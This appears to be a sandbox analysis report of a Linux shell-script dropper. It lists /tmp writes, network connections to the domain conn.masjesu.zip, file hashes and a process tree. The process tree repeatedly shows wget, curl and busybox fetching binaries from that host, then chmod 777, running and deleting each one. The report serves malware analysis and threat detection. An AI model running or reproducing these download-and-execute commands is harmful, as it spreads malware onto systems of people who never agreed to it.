N/A /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE N/A
N/A /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ N/A
N/A /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik N/A
N/A /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq N/A
N/A /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN N/A
N/A /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc N/A
N/A /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX N/A
N/A /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 N/A
N/A /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm N/A
N/A /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f N/A
N/A /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /usr/bin/curl N/A
File opened for modification /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /usr/bin/curl N/A
File opened for modification /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /usr/bin/curl N/A
File opened for modification /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /usr/bin/curl N/A
File opened for modification /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /usr/bin/curl N/A
File opened for modification /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /usr/bin/curl N/A
File opened for modification /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /usr/bin/curl N/A
File opened for modification /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /usr/bin/curl N/A
File opened for modification /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /usr/bin/curl N/A
File opened for modification /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /usr/bin/curl N/A
File opened for modification /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm /usr/bin/curl N/A
File opened for modification /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD /usr/bin/curl N/A

Processes

/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/bin/chmod

[chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM

[./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/bin/rm

[rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/bin/chmod

[chmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE

[./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/bin/rm

[rm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/bin/chmod

[chmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ

[./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/bin/rm

[rm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/bin/chmod

[chmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik

[./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/bin/rm

[rm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/bin/chmod

[chmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq

[./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/bin/rm

[rm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/bin/chmod

[chmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN

[./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/bin/rm

[rm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/bin/chmod

[chmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc

[./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/bin/rm

[rm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/bin/chmod

[chmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX

[./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/bin/rm

[rm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/bin/chmod

[chmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5

[./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/bin/rm

[rm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/bin/chmod

[chmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm

[./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/bin/rm

[rm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/chmod

[chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f

[./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/rm

[rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/bin/chmod

[chmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD

[./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/bin/rm

[rm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97